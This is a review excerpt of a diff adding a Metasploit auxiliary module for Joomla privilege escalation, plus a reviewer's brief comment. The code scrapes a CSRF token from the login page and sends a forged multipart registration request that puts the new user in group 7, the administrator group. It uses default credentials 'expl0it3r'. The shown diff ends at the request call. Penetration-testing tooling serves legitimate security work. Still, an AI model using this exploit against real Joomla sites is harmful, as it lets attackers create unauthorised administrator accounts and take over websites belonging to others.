modules/auxiliary/admin/http/joomla_privilege_escalation.rb

```diff
@@ -0,0 +1,140 @@
+        OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),
+        OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),
+        OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])
+      ], self.class)
+      deregister_options('VHOST')
+  end
+
+  def run
+    print_status("Trying to create the user!")
+    response = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),
+      'vars_get' => {
+        'view' => 'login'
+      }
+    )
+
+    cookie = response.get_cookies
+    csrf = response.body.match(/name="(\w{32})"/i).captures[0]
+
+    boundary = "157247343414135650641514240823"
+
+    ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
+
+    post_data = ""
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[name]\"" + "\r\n\r\n"
+    post_data << datastore['USERNAME'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[username]\"" + "\r\n\r\n"
+    post_data << datastore['USERNAME'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[groups][]\"" + "\r\n\r\n"
+    post_data << "7" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[password1]\"" + "\r\n\r\n"
+    post_data << datastore['PASSWORD'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[password2]\"" + "\r\n\r\n"
+    post_data << datastore['PASSWORD'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[email1]\"" + "\r\n\r\n"
+    post_data << datastore['EMAIL'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[email2]\"" + "\r\n\r\n"
+    post_data << datastore['EMAIL']  + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"option\"" + "\r\n\r\n"
+    post_data << "com_users" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"task\"" + "\r\n\r\n"
+    post_data << "user.register" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"#{csrf}\"" + "\r\n\r\n"
+    post_data << "1" + "\r\n"
+    post_data << "-----------------------------#{boundary}--" + "\r\n"
+
+    res = send_request_raw(
```

Comment:
Using the ```!```-method might be helpful for redirects. Honestly haven't run the module yet, so idk.